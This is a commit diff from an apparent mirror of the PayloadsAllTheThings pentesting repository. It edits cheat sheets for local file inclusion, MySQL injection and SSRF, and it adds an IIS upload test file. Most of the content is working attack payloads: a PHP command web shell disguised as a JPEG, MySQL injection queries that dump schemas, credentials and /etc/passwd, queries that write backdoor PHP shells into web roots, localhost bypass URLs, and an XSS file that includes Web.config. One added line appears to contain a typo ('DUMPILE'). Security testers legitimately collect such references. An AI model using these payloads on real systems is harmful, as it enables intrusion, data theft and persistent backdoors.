mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-22 20:36:12 +00:00
MySQL - Code exec
This commit is contained in:
parent
edd5f3601f
commit
f740d8e825
@ -72,7 +72,7 @@ http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encod
|
|||||||
|
|
||||||
LFI Wrapper ZIP
|
LFI Wrapper ZIP
|
||||||
```python
|
```python
|
||||||
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
|
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
|
||||||
zip payload.zip payload.php;
|
zip payload.zip payload.php;
|
||||||
mv payload.zip shell.jpg;
|
mv payload.zip shell.jpg;
|
||||||
rm payload.php
|
rm payload.php
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
# MYSQL Injection
|
# MYSQL Injection
|
||||||
|
|
||||||
##Detect columns number
|
## Detect columns number
|
||||||
Using a simple ORDER
|
Using a simple ORDER
|
||||||
```
|
```
|
||||||
order by 1
|
order by 1
|
||||||
@ -10,7 +10,7 @@ order by 3
|
|||||||
order by XXX
|
order by XXX
|
||||||
```
|
```
|
||||||
|
|
||||||
##MySQL Union Based
|
## MySQL Union Based
|
||||||
```
|
```
|
||||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
||||||
@ -18,13 +18,13 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_sc
|
|||||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
||||||
```
|
```
|
||||||
|
|
||||||
##MySQL Error Based - Basic
|
## MySQL Error Based - Basic
|
||||||
```
|
```
|
||||||
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
||||||
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
||||||
```
|
```
|
||||||
|
|
||||||
##MYSQL Error Based - UpdateXML function
|
## MYSQL Error Based - UpdateXML function
|
||||||
```
|
```
|
||||||
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
||||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
|
||||||
@ -33,7 +33,7 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126))
|
|||||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
|
||||||
```
|
```
|
||||||
|
|
||||||
##MYSQL Error Based - Extractvalue function
|
## MYSQL Error Based - Extractvalue function
|
||||||
```
|
```
|
||||||
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
||||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
||||||
@ -42,7 +42,7 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12
|
|||||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
||||||
```
|
```
|
||||||
|
|
||||||
##MYSQL Blind with MAKE_SET
|
## MYSQL Blind with MAKE_SET
|
||||||
```
|
```
|
||||||
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
||||||
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
||||||
@ -50,7 +50,7 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
|||||||
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
||||||
```
|
```
|
||||||
|
|
||||||
##MYSQL Time Based
|
## MYSQL Time Based
|
||||||
```
|
```
|
||||||
+BENCHMARK(40000000,SHA1(1337))+
|
+BENCHMARK(40000000,SHA1(1337))+
|
||||||
'%2Bbenchmark(3200,SHA1(1))%2B'
|
'%2Bbenchmark(3200,SHA1(1))%2B'
|
||||||
@ -58,19 +58,20 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
##MYSQL Read content of a file
|
## MYSQL Read content of a file
|
||||||
```
|
```
|
||||||
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
||||||
```
|
```
|
||||||
|
|
||||||
##MySQL DIOS - Dump in One Shot
|
## MySQL DIOS - Dump in One Shot
|
||||||
```
|
```
|
||||||
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
||||||
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
||||||
```
|
```
|
||||||
|
|
||||||
##MYSQL DROP SHELL
|
## MYSQL DROP SHELL
|
||||||
```
|
```
|
||||||
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
|
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
|
||||||
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
|
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
|
||||||
|
-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
|
||||||
```
|
```
|
||||||
|
@ -43,6 +43,14 @@ http://[::]:22/ SSH
|
|||||||
http://[::]:3128/ Squid
|
http://[::]:3128/ Squid
|
||||||
```
|
```
|
||||||
|
|
||||||
|
```
|
||||||
|
http://0000::1:80/
|
||||||
|
http://0000::1:25/ SMTP
|
||||||
|
http://0000::1:22/ SSH
|
||||||
|
http://0000::1:3128/ Squid
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
Bypass localhost with a domain redirecting to locahost
|
Bypass localhost with a domain redirecting to locahost
|
||||||
```
|
```
|
||||||
http://n-pn.info
|
http://n-pn.info
|
||||||
|
14
Upload insecure files/IIS/index.stm
Normal file
14
Upload insecure files/IIS/index.stm
Normal file
@ -0,0 +1,14 @@
|
|||||||
|
<!DOCTYPE html>
|
||||||
|
<html>
|
||||||
|
|
||||||
|
<head>
|
||||||
|
<meta charset="utf-8" />
|
||||||
|
<title></title>
|
||||||
|
</head>
|
||||||
|
|
||||||
|
<body>
|
||||||
|
<!-- #include file = "Web.config" -->
|
||||||
|
<script>alert('XSS')</script>
|
||||||
|
</body>
|
||||||
|
|
||||||
|
</html>
|
Loading…
Reference in New Issue
Block a user